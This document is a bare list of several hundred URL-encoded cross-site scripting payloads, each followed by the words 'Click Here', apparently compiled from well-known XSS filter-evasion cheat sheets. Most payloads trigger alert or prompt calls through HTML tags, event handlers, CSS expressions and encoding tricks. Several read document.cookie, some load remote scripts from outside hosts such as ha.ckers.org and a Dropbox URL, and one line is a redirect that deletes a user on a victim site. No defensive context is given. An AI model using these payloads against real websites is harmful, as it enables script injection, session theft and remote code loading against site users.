%3cform%20id%3d%22test%22%20%2f%3e%3cbutton%20form%3d%22test%22%20formaction%3d%22javascript%3ajavascript%3aalert(1)%22%3eXClick Here

%3cP%20STYLE%3d%22behavior%3aurl('%23default%23time2')%22%20end%3d%220%22%20onEnd%3d%22javascript%3aalert(1)%22%3eClick Here

%3cSTYLE%3ea%7bbackground%3aurl('s1'%20's2)%7d@import%20javascript%3ajavascript%3aalert(1)%3b')%3b%7d%3c%2fSTYLE%3eClick Here

%3cSTYLE%3e@import'%(css)s'%3b%3c%2fSTYLE%3eClick Here

%3cSCRIPT%20onreadystatechange%3djavascript%3ajavascript%3aalert(1)%3b%3e%3c%2fSCRIPT%3eClick Here

%3cmeta%20charset%3d%20%22x-imap4-modified-utf7%22%26%26%3e%26%26%3cscript%26%26%3ejavascript%3aalert(1)%26%26%3b%26%26%3c%26%26%2fscript%26%26%3eClick Here

%3cstyle%20onreadystatechange%3djavascript%3ajavascript%3aalert(1)%3b%3e%3c%2fstyle%3eClick Here

%3cembed%20src%3d%(jscript)s%3e%3c%2fembed%3eClick Here

%3cembed%20code%3djavascript%3ajavascript%3aalert(1)%3b%3e%3c%2fembed%3eClick Here

%3cembed%20code%3d%(scriptlet)s%3e%3c%2fembed%3eClick Here

%3c%3fxml%20version%3d%221%2e0%22%3f%3e%3chtml%3ahtml%20xmlns%3ahtml%3d'http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml'%3e%3chtml%3ascript%3ejavascript%3aalert(1)%3b%3c%2fhtml%3ascript%3e%3c%2fhtml%3ahtml%3eClick Here

%3cframeset%20onload%3djavascript%3ajavascript%3aalert(1)%3e%3c%2fframeset%3eClick Here

%3cembed%20type%3d%22image%22%20src%3d%(scriptlet)s%3e%3c%2fembed%3eClick Here

%3cobject%20onerror%3djavascript%3ajavascript%3aalert(1)%3eClick Here

%3cXML%20ID%3dI%3e%3cX%3e%3cC%3e%3c![CDATA[%3cIMG%20SRC%3d%22javas]]%3c![CDATA[cript%3ajavascript%3aalert(1)%3b%22%3e]]%3c%2fC%3e%3cX%3e%3c%2fxml%3eClick Here

%3cIMG%20SRC%3d%26%7bjavascript%3aalert(1)%3b%7d%3b%3eClick Here

%3ca%20href%3d%22jav%26%2365ascript%3ajavascript%3aalert(1)%22%3etest1%3c%2fa%3eClick Here

%3ca%20href%3d%22jav%26%2397ascript%3ajavascript%3aalert(1)%22%3etest1%3c%2fa%3eClick Here

%3cembed%20width%3d500%20height%3d500%20code%3d%22data%3atext%2fhtml,%3cscript%3e%(payload)s%3c%2fscript%3e%22%3e%3c%2fembed%3eClick Here

%3ciframe%20srcdoc%3d%22%26LT%3biframe%26sol%3bsrcdoc%3d%26amp%3blt%3bimg%26sol%3bsrc%3d%26amp%3bapos%3b%26amp%3bapos%3bonerror%3djavascript%3aalert(1)%26amp%3bgt%3b%3e%22%3eClick Here

'%3balert(String%2efromCharCode(88,83,83))%2f%2f'%3balert(String%2efromCharCode(88,83,83))%2f%2f%22%3bClick Here

alert(String%2efromCharCode(88,83,83))%2f%2f%22%3balert(String%2efromCharCode(88,83,83))%2f%2f--Click Here

%3e%3c%2fSCRIPT%3e%22%3e'%3e%3cSCRIPT%3ealert(String%2efromCharCode(88,83,83))%3c%2fSCRIPT%3eClick Here

''%3b!--%22%3cXSS%3e%3d%26%7b()%7dClick Here

%3cSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3e%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3dJaVaScRiPt%3aalert('XSS')%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(%22XSS%22)%3eClick Here

%3cIMG%20SRC%3d%60javascript%3aalert(%22RSnake%20says,%20'XSS'%22)%60%3eClick Here

%3ca%20onmouseover%3d%22alert(document%2ecookie)%22%3exxs%20link%3c%2fa%3eClick Here

%3cIMG%20%22%22%22%3e%3cSCRIPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e%22%3eClick Here

%3cIMG%20SRC%3djavascript%3aalert(String%2efromCharCode(88,83,83))%3eClick Here

%3ca%20onmouseover%3dalert(document%2ecookie)%3exxs%20link%3c%2fa%3eClick Here

%3cIMG%20SRC%3d%23%20onmouseover%3d%22alert('xxs')%22%3eClick Here

%3cIMG%20onmouseover%3d%22alert('xxs')%22%3eClick Here

%3cIMG%20SRC%3d%20onmouseover%3d%22alert('xxs')%22%3eClick Here

%3cIMG%20SRC%3d%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3eClick Here

%3cIMG%20SRC%3d%22jav ascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x0A%3bascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x09%3bascript%3aalert('XSS')%3b%22%3eClick Here

%3cIMG%20SRC%3d%22jav%26%23x0D%3bascript%3aalert('XSS')%3b%22%3eClick Here

perl%20-e%20'print%20%22%3cIMG%20SRC%3djava%5c0script%3aalert(%5c%22XSS%5c%22)%3e%22%3b'%20%3e%20outClick Here

%3cIMG%20SRC%3d%22%20%26%2314%3b%20%20javascript%3aalert('XSS')%3b%22%3eClick Here

%3cSCRIPT%2fXSS%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cBODY%20onload!%23$%%26()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3dalert(%22XSS%22)%3eClick Here

%3cSCRIPT%2fSRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3f%3c%20B%20%3eClick Here

%3cSCRIPT%20SRC%3d%2f%2fha%2eckers%2eorg%2f%2ej%3eClick Here

%3c%3cSCRIPT%3ealert(%22XSS%22)%3b%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3d%22javascript%3aalert('XSS')%22Click Here

%3ciframe%20src%3dhttp%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%20%3cClick Here

%5c%22%3balert('XSS')%3b%2f%2fClick Here

%3c%2fTITLE%3e%3cSCRIPT%3ealert(%22XSS%22)%3b%3c%2fSCRIPT%3eClick Here

%3cIMG%20DYNSRC%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cBODY%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cIMG%20LOWSRC%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cINPUT%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cSTYLE%3eli%20%7blist-style-image%3a%20url(%22javascript%3aalert('XSS')%22)%3b%7d%3c%2fSTYLE%3e%3cUL%3e%3cLI%3eXSS%3c%2fbr%3eClick Here

%3cIMG%20SRC%3d'vbscript%3amsgbox(%22XSS%22)'%3eClick Here

%3cIMG%20SRC%3d%22livescript%3a[code]%22%3eClick Here

%3cBGSOUND%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cBODY%20ONLOAD%3dalert('XSS')%3eClick Here

%3cBR%20SIZE%3d%22%26%7balert('XSS')%7d%22%3eClick Here

%3cLINK%20REL%3d%22stylesheet%22%20HREF%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%22%3eClick Here

%3cLINK%20REL%3d%22stylesheet%22%20HREF%3d%22javascript%3aalert('XSS')%3b%22%3eClick Here

%3cSTYLE%3e@import'http%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss'%3b%3c%2fSTYLE%3eClick Here

%3cSTYLE%3eBODY%7b-moz-binding%3aurl(%22http%3a%2f%2fha%2eckers%2eorg%2fxssmoz%2exml%23xss%22)%7d%3c%2fSTYLE%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22Link%22%20Content%3d%22%3chttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ecss%3e%3b%20REL%3dstylesheet%22%3eClick Here

%3cIMG%20STYLE%3d%22xss%3aexpr%2f%2aXSS%2a%2fession(alert('XSS'))%22%3eClick Here

%3cSTYLE%3e@im%5cport'%5cja%5cvasc%5cript%3aalert(%22XSS%22)'%3b%3c%2fSTYLE%3eClick Here

%3cSTYLE%20TYPE%3d%22text%2fjavascript%22%3ealert('XSS')%3b%3c%2fSTYLE%3eClick Here

exp%2f%2a%3cA%20STYLE%3d'no%5cxss%3anoxss(%22%2a%2f%2f%2a%22)%3bxss%3aex%2f%2aXSS%2a%2f%2f%2a%2f%2a%2fpression(alert(%22XSS%22))'%3eClick Here

%3cSTYLE%3e%2eXSS%7bbackground-image%3aurl(%22javascript%3aalert('XSS')%22)%3b%7d%3c%2fSTYLE%3e%3cA%20CLASS%3dXSS%3e%3c%2fA%3eClick Here

%3cSTYLE%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3aalert('XSS')%22)%7d%3c%2fSTYLE%3eClick Here

%3cSTYLE%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3aalert('XSS')%22)%7d%3c%2fSTYLE%3eClick Here

%3cXSS%20STYLE%3d%22xss%3aexpression(alert('XSS'))%22%3eClick Here

%3cXSS%20STYLE%3d%22behavior%3a%20url(xss%2ehtc)%3b%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3djavascript%3aalert('XSS')%3b%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3ddata%3atext%2fhtml%20base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%22%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fIFRAME%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3aalert('XSS')%3b%22%3eClick Here

%3cIFRAME%20SRC%3d%23%20onmouseover%3d%22alert(document%2ecookie)%22%3e%3c%2fIFRAME%3eClick Here

%3cFRAMESET%3e%3cFRAME%20SRC%3d%22javascript%3aalert('XSS')%3b%22%3e%3c%2fFRAMESET%3eClick Here

%3cTABLE%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cTABLE%3e%3cTD%20BACKGROUND%3d%22javascript%3aalert('XSS')%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(javascript%3aalert('XSS'))%22%3eClick Here

%3cDIV%20STYLE%3d%22width%3a%20expression(alert('XSS'))%3b%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(%26%231%3bjavascript%3aalert('XSS'))%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%5c0075%5c0072%5c006C%5c0028'%5c006a%5c0061%5c0076%5c0061%5c0073%5c0063%5c0072%5c0069%5c0070%5c0074%5c003a%5c0061%5c006c%5c0065%5c0072%5c0074%5c0028%2e1027%5c0058%2e1053%5c0053%5c0027%5c0029'%5c0029%22%3eClick Here

%20%3cOBJECT%20TYPE%3d%22text%2fx-scriptlet%22%20DATA%3d%22http%3a%2f%2fha%2eckers%2eorg%2fscriptlet%2ehtml%22%3e%3c%2fOBJECT%3eClick Here

%3cBASE%20HREF%3d%22javascript%3aalert('XSS')%3b%2f%2f%22%3eClick Here

%3cSCRIPT%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejpg%22%3e%3c%2fSCRIPT%3eClick Here

%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'%3cSCR'%22--%3e%3c!--%23exec%20cmd%3d%22%2fbin%2fecho%20'IPT%20SRC%3dhttp%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%3e%3c%2fSCRIPT%3e'%22--%3eClick Here

%20%3cHEAD%3e%3cMETA%20HTTP-EQUIV%3d%22CONTENT-TYPE%22%20CONTENT%3d%22text%2fhtml%3b%20charset%3dUTF-7%22%3e%20%3c%2fHEAD%3e%2bADw-SCRIPT%2bAD4-alert('XSS')%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

%3c%3f%20echo('%3cSCR)'%3becho('IPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e')%3b%20%3f%3eClick Here

%3cSCRIPT%20a%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22Set-Cookie%22%20Content%3d%22USERID%3d%3cSCRIPT%3ealert('XSS')%3c%2fSCRIPT%3e%22%3eClick Here

Redirect%20302%20%2fa%2ejpg%20http%3a%2f%2fvictimsite%2ecom%2fadmin%2easp%26deleteuserClick Here

%3cSCRIPT%20%3d%22%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%22%3e%22%20''%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20%22a%3d'%3e'%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%60%3e%60%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%20a%3d%22%3e'%3e%22%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%3edocument%2ewrite(%22%3cSCRI%22)%3b%3c%2fSCRIPT%3ePT%20SRC%3d%22http%3a%2f%2fha%2eckers%2eorg%2fxss%2ejs%22%3e%3c%2fSCRIPT%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f66%2e102%2e7%2e147%2f%22%3eXSS%3c%2fA%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f1113982867%2f%22%3eXSS%3c%2fA%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%22%3eXSS%3c%2fA%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f0x42%2e0x0000066%2e0x7%2e0x93%2f%22%3eXSS%3c%2fA%3eClick Here

%3cA%20HREF%3d%22htt p%3a%2f%2f6 6%2e000146%2e0x7%2e147%2f%22%3eXSS%3c%2fA%3eClick Here

%3cA%20HREF%3d%22http%3a%2f%2f0102%2e0146%2e0007%2e00000223%2f%22%3eXSS%3c%2fA%3eClick Here

%3ciframe%20%00%20src%3d%22%26Tab%3bjavascript%3aprompt(1)%26Tab%3b%22%00%3eClick Here

%3csvg%3e%3cstyle%3e%7bfont-family%26colon%3b'%3ciframe%2fonload%3dconfirm(1)%3e'Click Here

%3csVg%3e%3cscRipt%20%00%3ealert%26lpar%3b1%26rpar%3b%20%7bOpera%7dClick Here

%3cimg%2fsrc%3d%60%00%60%20onerror%3dthis%2eonerror%3dconfirm(1)%20Click Here

%3cinput%2fonmouseover%3d%22javaSCRIPT%26colon%3bconfirm%26lpar%3b1%26rpar%3b%22Click Here

%3cform%3e%3cisindex%20formaction%3d%22javascript%26colon%3bconfirm(1)%22Click Here

%3cimg%20src%3d%60%00%60%26NewLine%3b%20onerror%3dalert(1)%26NewLine%3bClick Here

%3cscript%2f%26Tab%3b%20src%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%20%2f%26Tab%3b%3e%3c%2fscript%3eClick Here

%3cScRipT%205-0%2a3%2b9%2f3%3d%3eprompt(1)%3c%2fScRipT%20giveanswerhere%3d%3fClick Here

%3ciframe%2fsrc%3d%22data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d%22%3eClick Here

%3cscript%20%2f%2a%00%2a%2f%3e%2f%2a%00%2a%2falert(1)%2f%2a%00%2a%2f%3c%2fscript%20%2f%2a%00%2a%2fClick Here

%26%2334%3b%26%2362%3b%3ch1%2fonmouseover%3d'%5cu0061lert(1)'%3e%00Click Here

%3ciframe%2fsrc%3d%22data%3atext%2fhtml,%3csvg%20%26%23111%3b%26%23110%3bload%3dalert(1)%3e%22%3eClick Here

%3cmeta%20content%3d%22%26NewLine%3b%201%20%26NewLine%3b%3b%20JAVASCRIPT%26colon%3b%20alert(1)%22%20http-equiv%3d%22refresh%22%2f%3eClick Here

%3csvg%3e%3cscript%20xlink%3ahref%3ddata%26colon%3b,window%2eopen('https%3a%2f%2fwww%2egoogle%2ecom%2f')%3e%3c%2fscriptClick Here

%3csvg%3e%3cscript%20x%3ahref%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%20%7bOpera%7dClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3burl%3djavascript%3aconfirm(1)%22%3eClick Here

%3c%2fscript%3e%3cimg%2f%2a%00%2fsrc%3d%22worksinchrome%26colon%3bprompt%26%23x28%3b1%26%23x29%3b%22%2f%00%2a%2fonerror%3d'eval(src)'%3eClick Here

%3ciframe%20src%3djavascript%26colon%3balert%26lpar%3bdocument%26period%3blocation%26rpar%3b%3eClick Here

%3cimg%2f%26%2309%3b%26%2310%3b%26%2311%3b%20src%3d%60~%60%20onerror%3dprompt(1)%3eClick Here

%3cform%3e%3ca%20href%3d%22javascript%3a%5cu0061lert%26%23x28%3b1%26%23x29%3b%22%3eXClick Here

%3cform%3e%3ciframe%20%26%2309%3b%26%2310%3b%26%2311%3b%20src%3d%22javascript%26%2358%3balert(1)%22%26%2311%3b%26%2310%3b%26%2309%3b%3b%3eClick Here

%3ca%20href%3d%22data%3aapplication%2fx-x509-user-cert%3b%26NewLine%3bbase64%26NewLine%3b,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3d%3d%22%26%2309%3b%26%2310%3b%26%2311%3b%3eX%3c%2faClick Here

http%3a%2f%2fwww%2egoogle%3cscript%20%2ecom%3ealert(document%2elocation)%3c%2fscriptClick Here

%3ca%26%2332%3bhref%26%2361%3b%26%2391%3b%26%2300%3b%26%2393%3b%22%26%2300%3b%20onmouseover%3dprompt%26%2340%3b1%26%2341%3b%26%2347%3b%26%2347%3b%22%3eXYZ%3c%2faClick Here

%3cimg%2fsrc%3d@%26%2332%3b%26%2313%3b%20onerror%20%3d%20prompt('%26%2349%3b')Click Here

%3cstyle%2fonload%3dprompt%26%2340%3b'%26%2388%3b%26%2383%3b%26%2383%3b'%26%2341%3bClick Here

%3cscript%20%5e__%5e%3ealert(String%2efromCharCode(49))%3c%2fscript%20%5e__%5eClick Here

%3c%2fstyle%20%26%2332%3b%3e%3cscript%20%26%2332%3b%20%3a-(%3e%2f%2a%2a%2falert(document%2elocation)%2f%2a%2a%2f%3c%2fscript%20%26%2332%3b%20%3a-(Click Here

%26%2300%3b%3c%2fform%3e%3cinput%20type%26%2361%3b%22date%22%20onfocus%3d%22alert(1)%22%3eClick Here

%3cscript%20%2f%2a%2a%2a%2f%3e%2f%2a%2a%2a%2fconfirm('%5cuFF41%5cuFF4C%5cuFF45%5cuFF52%5cuFF54%5cu1455%5cuFF11%5cu1450')%2f%2a%2a%2a%2f%3c%2fscript%20%2f%2a%2a%2a%2fClick Here

%3cform%3e%3ctextarea%20%26%2313%3b%20onkeyup%3d'%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074%26%23x28%3b1%26%23x29%3b'%3eClick Here

%3ciframe%20srcdoc%3d'%26lt%3bbody%20onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'%3eClick Here

%3cstyle%2fonload%3d%26lt%3b!--%26%2309%3b%26gt%3b%26%2310%3balert%26%2310%3b%26lpar%3b1%26rpar%3b%3eClick Here

%3ca%20href%3d%22javascript%3avoid(0)%22%20onmouseover%3d%26NewLine%3bjavascript%3aalert(1)%26NewLine%3b%3eX%3c%2fa%3eClick Here

%3cscript%20~~~%3ealert(0%0)%3c%2fscript%20~~~%3eClick Here

%3c%2f%2f%2fstyle%2f%2f%2f%3e%3cspan%20%2F%20onmousemove%3d'alert%26lpar%3b1%26rpar%3b'%3eSPANClick Here

%3cimg%2fsrc%3d'http%3a%2f%2fi%2eimgur%2ecom%2fP8mL8%2ejpg'%20onmouseover%3d%26Tab%3bprompt(1)Click Here

%26%2334%3b%26%2362%3b%3csvg%3e%3cstyle%3e%7b-o-link-source%26colon%3b'%3cbody%2fonload%3dconfirm(1)%3e'Click Here

%3cmarquee%20onstart%3d'javascript%3aalert%26%23x28%3b1%26%23x29%3b'%3e%5e__%5eClick Here

%26%2313%3b%3cblink%2f%26%2313%3b%20onmouseover%3dpr%26%23x6F%3bmp%26%23116%3b(1)%3eOnMouseOver%20%7bFirefox%20%26%20Opera%7dClick Here

%3cdiv%2fstyle%3d%22width%3aexpression(confirm(1))%22%3eX%3c%2fdiv%3e%20%7bIE7%7dClick Here

%3ciframe%2f%00%2f%20src%3djavaSCRIPT%26colon%3balert(1)Click Here

%2f%2f%3cform%2faction%3djavascript%26%23x3A%3balert%26lpar%3bdocument%26period%3bcookie%26rpar%3b%3e%3cinput%2ftype%3d'submit'%3e%2f%2fClick Here

%2f%2f%7c%5c%5c%20%3cscript%20%2f%2f%7c%5c%5c%20src%3d'https%3a%2f%2fdl%2edropbox%2ecom%2fu%2f13018058%2fjs%2ejs'%3e%20%2f%2f%7c%5c%5c%20%3c%2fscript%20%2f%2f%7c%5c%5cClick Here

%3c%2ffont%3e%2f%3csvg%3e%3cstyle%3e%7bsrc%26%23x3A%3b'%3cstyle%2fonload%3dthis%2eonload%3dconfirm(1)%3e'%3c%2ffont%3e%2f%3c%2fstyle%3eClick Here

%2f%2aiframe%2fsrc%2a%2f%3ciframe%2fsrc%3d%22%3ciframe%2fsrc%3d@%22%2fonload%3dprompt(1)%20%2f%2aiframe%2fsrc%2a%2f%3eClick Here

%3ca%2fhref%3d%22javascript%3a%26%2313%3b%20javascript%3aprompt(1)%22%3e%3cinput%20type%3d%22X%22%3eClick Here

%3c%2fplaintext%5c%3e%3c%2f%7c%5c%3e%3cplaintext%2fonmouseover%3dprompt(1)Click Here

%3c%2fsvg%3e''%3csvg%3e%3cscript%20'AQuickBrownFoxJumpsOverTheLazyDog'%3ealert%26%23x28%3b1%26%23x29%3b%20%7bOpera%7dClick Here

%3cdiv%20onmouseover%3d'alert%26lpar%3b1%26rpar%3b'%3eDIV%3c%2fdiv%3eClick Here

%3ca%20href%3d%22javascript%26colon%3b%5cu0061%26%23x6C%3b%26%23101%72t%26lpar%3b1%26rpar%3b%22%3e%3cbutton%3eClick Here

%3ca%20href%3d%22jAvAsCrIpT%26colon%3balert%26lpar%3b1%26rpar%3b%22%3eX%3c%2fa%3eClick Here

%3cembed%20src%3d%22http%3a%2f%2fcorkami%2egooglecode%2ecom%2fsvn%2f!svn%2fbc%2f480%2ftrunk%2fmisc%2fpdf%2fhelloworld_js_X%2epdf%22%3eClick Here

%3ciframe%20style%3d%22position%3aabsolute%3btop%3a0%3bleft%3a0%3bwidth%3a100%%3bheight%3a100%%22%20onmouseover%3d%22prompt(1)%22%3eClick Here

%3cobject%20data%3d%22http%3a%2f%2fcorkami%2egooglecode%2ecom%2fsvn%2f!svn%2fbc%2f480%2ftrunk%2fmisc%2fpdf%2fhelloworld_js_X%2epdf%22%3eClick Here

%3cvar%20onmouseover%3d%22prompt(1)%22%3eOn%20Mouse%20Over%3c%2fvar%3eClick Here

%3ca%20href%3djavascript%26colon%3balert%26lpar%3bdocument%26period%3bcookie%26rpar%3b%3eClick%20Here%3c%2fa%3eClick Here

%3cimg%20src%3d%22%2f%22%20%3d_%3d%22%20title%3d%22onerror%3d'prompt(1)'%22%3eClick Here

%3c%%3c!--'%%3e%3cscript%3ealert(1)%3b%3c%2fscript%20--%3eClick Here

%3cscript%20src%3d%22data%3atext%2fjavascript,alert(1)%22%3e%3c%2fscript%3eClick Here

%3csvg%2fonload%3dalert(1)Click Here

%3ciframe%2fsrc%20%5c%2f%5c%2fonload%20%3d%20prompt(1)Click Here

%3ciframe%2fonreadystatechange%3dalert(1)Click Here

%3cinput%20value%3d%3c%3e%3ciframe%2fsrc%3djavascript%3aconfirm(1)Click Here

%3cinput%20type%3d%22text%22%20value%3d%60%60%20%3cdiv%2fonmouseover%3d'alert(1)'%3eX%3c%2fdiv%3eClick Here

http%3a%2f%2fwww%2e%3cscript%3ealert(1)%3c%2fscript%20%2ecomClick Here

%3csvg%3e%3cscript%20%3f%3ealert(1)Click Here

%3ciframe%20src%3dj%26Tab%3ba%26Tab%3bv%26Tab%3ba%26Tab%3bs%26Tab%3bc%26Tab%3br%26Tab%3bi%26Tab%3bp%26Tab%3bt%26Tab%3b%3aa%26Tab%3bl%26Tab%3be%26Tab%3br%26Tab%3bt%26Tab%3b%28%26Tab%3b1%26Tab%3b%29%3e%3c%2fiframe%3eClick Here

%3cimg%20src%3d%60xx%3axx%60onerror%3dalert(1)%3eClick Here

%3cobject%20type%3d%22text%2fx-scriptlet%22%20data%3d%22http%3a%2f%2fjsfiddle%2enet%2fXLE63%2f%20%22%3e%3c%2fobject%3eClick Here

%3cmeta%20http-equiv%3d%22refresh%22%20content%3d%220%3bjavascript%26colon%3balert(1)%22%2f%3eClick Here

%3cmath%3e%3ca%20xlink%3ahref%3d%22%2f%2fjsfiddle%2enet%2ft846h%2f%22%3eclickClick Here

%3cembed%20code%3d%22http%3a%2f%2fbusinessinfo%2eco%2euk%2flabs%2fxss%2fxss%2eswf%22%20allowscriptaccess%3dalways%3eClick Here

%3csvg%20contentScriptType%3dtext%2fvbs%3e%3cscript%3eMsgBox%2b1Click Here

%3ciframe%2fonreadystatechange%3d%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074('%5cu0061')%20worksinIE%3eClick Here

%3ca%20href%3d%22data%3atext%2fhtml%3bbase64_,%3csvg%2fonload%3d%5cu0061%26%23x6C%3b%26%23101%72t(1)%3e%22%3eX%3c%2faClick Here

%3cscript%2fsrc%3d%22data%26colon%3btext%2Fj%5cu0061v%5cu0061script,%5cu0061lert('%5cu0061')%22%3e%3c%2fscript%20a%3d%5cu0061%20%26%20%2f%3d%2FClick Here

%3cscript%3e~'%5cu0061'%20%3b%20%5cu0074%5cu0068%5cu0072%5cu006F%5cu0077%20~%20%5cu0074%5cu0068%5cu0069%5cu0073%2e%20%5cu0061%5cu006C%5cu0065%5cu0072%5cu0074(~'%5cu0061')%3c%2fscript%20U%2bClick Here

%3cscript%2fsrc%3ddata%26colon%3btext%2fj%5cu0061v%5cu0061%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116,%5cu0061%6C%65%72%74(%2fXSS%2f)%3e%3c%2fscriptClick Here

%3cobject%20data%3djavascript%26colon%3b%5cu0061%26%23x6C%3b%26%23101%72t(1)%3eClick Here

%3cbody%2fonload%3d%26lt%3b!--%26gt%3b%26%2310alert(1)%3eClick Here

%3cscript%3e%2b-%2b-1-%2b-%2balert(1)%3c%2fscript%3eClick Here

%3csvg%3e%3cscript%20onlypossibleinopera%3a-)%3e%20alert(1)Click Here

%3cscript%20itworksinallbrowsers%3e%2f%2a%3cscript%2a%20%2a%2falert(1)%3c%2fscriptClick Here

%3cimg%20src%20%3fitworksonchrome%3f%5c%2fonerror%20%3d%20alert(1)Click Here

%3ca%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20aaaaaaaaa%20aaaaaaaaaa%20href%3dj%26%2397v%26%2397script%26%23x3A%3b%26%2397lert(1)%3eClickMeClick Here

%3cscript%20x%3e%20alert(1)%20%3c%2fscript%201%3d2Click Here

%3cdiv%2fonmouseover%3d'alert(1)'%3e%20style%3d%22x%3a%22%3eClick Here

%3cscript%2fsrc%3d%26%23100%26%2397%26%23116%26%2397%3atext%2f%26%23x6a%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x000070%26%23x074,%26%23x0061%3b%26%23x06c%3b%26%23x0065%3b%26%23x00000072%3b%26%23x00074%3b(1)%3e%3c%2fscript%3eClick Here

%3c--%60%3cimg%2fsrc%3d%60%20onerror%3dalert(1)%3e%20--!%3eClick Here

%3csvg%3e%3cscript%3e%2f%2f%26NewLine%3bconfirm(1)%3b%3c%2fscript%20%3c%2fsvg%3eClick Here

%3cdiv%20style%3d%22position%3aabsolute%3btop%3a0%3bleft%3a0%3bwidth%3a100%%3bheight%3a100%%22%20onmouseover%3d%22prompt(1)%22%20onclick%3d%22alert(1)%22%3ex%3c%2fbutton%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3dwindow%2eopen('https%3a%2f%2fwww%2egoogle%2ecom%2f')%3b%3eClick Here

%3cform%3e%3cbutton%20formaction%3djavascript%26colon%3balert(1)%3eCLICKMEClick Here

%3cobject%20data%3ddata%3atext%2fhtml%3bbase64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik%2b%3e%3c%2fobject%3eClick Here

